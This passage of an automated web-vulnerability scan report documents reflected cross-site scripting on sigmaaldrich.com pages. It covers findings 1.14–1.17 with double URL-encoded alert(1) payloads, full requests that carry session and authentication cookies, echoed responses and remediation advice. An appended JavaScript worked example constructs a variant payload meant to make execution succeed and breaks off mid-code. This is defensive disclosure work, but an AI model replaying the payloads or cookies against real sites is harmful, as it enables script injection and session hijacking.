Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/fluka-analytical64f3d";alert(1)//484e4ebf13c/customware-oem.html","E404") ;
   </script>
...[SNIP]...

1.14. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6189a%2522%253balert%25281%2529%252f%252f820223a893e was submitted in the REST URL parameter 3. This input was echoed as 6189a";alert(1)//820223a893e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/fluka-analytical/6189a%2522%253balert%25281%2529%252f%252f820223a893e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/fluka-analytical/6189a";alert(1)//820223a893e","E404") ;
   </script>
...[SNIP]...

1.15. http://www.sigmaaldrich.com/analytical-chromatography/gas-chromatography.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/gas-chromatography.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60f3%2522%253balert%25281%2529%252f%252f722fc13639f was submitted in the REST URL parameter 1. This input was echoed as d60f3";alert(1)//722fc13639f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyd60f3%2522%253balert%25281%2529%252f%252f722fc13639f/gas-chromatography.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyd60f3";alert(1)//722fc13639f/gas-chromatography.html","E404") ;
   </script>
...[SNIP]...

1.16. http://www.sigmaaldrich.com/analytical-chromatography/gas-chromatography.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/gas-chromatography.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1692%2522%253balert%25281%2529%252f%252f930c055d40c was submitted in the REST URL parameter 2. This input was echoed as e1692";alert(1)//930c055d40c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/e1692%2522%253balert%25281%2529%252f%252f930c055d40c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/e1692";alert(1)//930c055d40c","E404") ;
   </script>
...[SNIP]...

1.17. http://www.sigmaaldrich.com/analytical-chromatography/hplc.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/hplc.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27425%2522%253balert%25281%2529%252f%252f263fc626307 was submitted in the REST URL parameter 1. This input was echoed as 27425";alert(1)//263fc626307 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography27425%2522%253balert%25281%2529%252f%252f263fc626307/hplc.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography27425";alert(1)//263fc626307/hplc.html","E404") ;
   </script>
...[SNIP]...
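Worked example, added by the editor and not part of the original report or of the site's own code. It reproduces the mechanism the issue and remediation details describe for the findings in this section (1.17 through 1.23 share it): the web server URL-decodes the path once, the application decodes it a second time, and the result is concatenated into a double-quoted JavaScript string inside the 404 page's script block. Two points the report's text does not show are worth seeing executed. First, the echoed PoC string as captured leaves the cmCreateErrorTag( call unclosed, so a JavaScript engine rejects it as a syntax error; the same injection point does execute once the payload also closes the call (a constructed variant below). Second, the fix has two parts: drop the second decode, and encode the value for the JS-string context rather than trying to block characters. renderVulnerable, renderFixed, jsStringLiteral and evaluateTag are hypothetical stand-ins for the server-side template and for a browser running the script; cmCreateErrorTag and alert are stubbed; the two non-report paths are constructed test inputs.

```javascript
// Added example (not code from the Burp report or from sigmaaldrich.com).
// Reproduces the double URL-decode plus script-context concatenation the
// report describes, checks what the echoed PoC actually does in a JS engine,
// and contrasts a fixed renderer. renderVulnerable, renderFixed and
// evaluateTag are hypothetical stand-ins; cmCreateErrorTag and alert are
// stubbed so the snippet runs offline.

// Request path copied from finding 1.17 (REST URL parameter 1).
const REPORTED_PATH =
  "/analytical-chromatography27425%2522%253balert%25281%2529%252f%252f263fc626307/hplc.html";

// Constructed variant: same payload but with %2529 -> ')' so the injected
// ';' lands after a closed cmCreateErrorTag( call.
const CLOSING_PATH =
  "/analytical-chromatography27425%2522%2529%253balert%25281%2529%252f%252f263fc626307/hplc.html";

// Constructed single-encoded attempt: what a once-decoding fix must still
// neutralise by output encoding.
const SINGLE_ENCODED_PATH =
  "/analytical-chromatography%22%29%3balert%281%29%2f%2f/hplc.html";

// The web server decodes once: %2522 -> %22. The application then decodes
// again: %22 -> ". The second decode is what lets the quote through.
const decodeOnce = (p) => decodeURIComponent(p);
const decodeTwice = (p) => decodeURIComponent(decodeURIComponent(p));

// Vulnerable pattern: doubly decoded path concatenated into a double-quoted
// JS string literal, as seen in the 404 page's <script> block.
function renderVulnerable(rawPath) {
  const url = "http://www.sigmaaldrich.com:4402" + decodeTwice(rawPath);
  return 'cmCreateErrorTag("Error 404 | ' + url + '","E404") ;';
}

// Escape a value for a JS string literal inside <script>. JSON.stringify
// handles quotes, backslashes and control characters; the extra replacements
// keep </script>, <!-- and the U+2028/U+2029 line terminators from ending the
// script block or the statement.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Fixed pattern: decode exactly once (in a real servlet the container has
// already done this, so the application's own decode is simply removed) and
// encode for the output context instead of filtering input characters.
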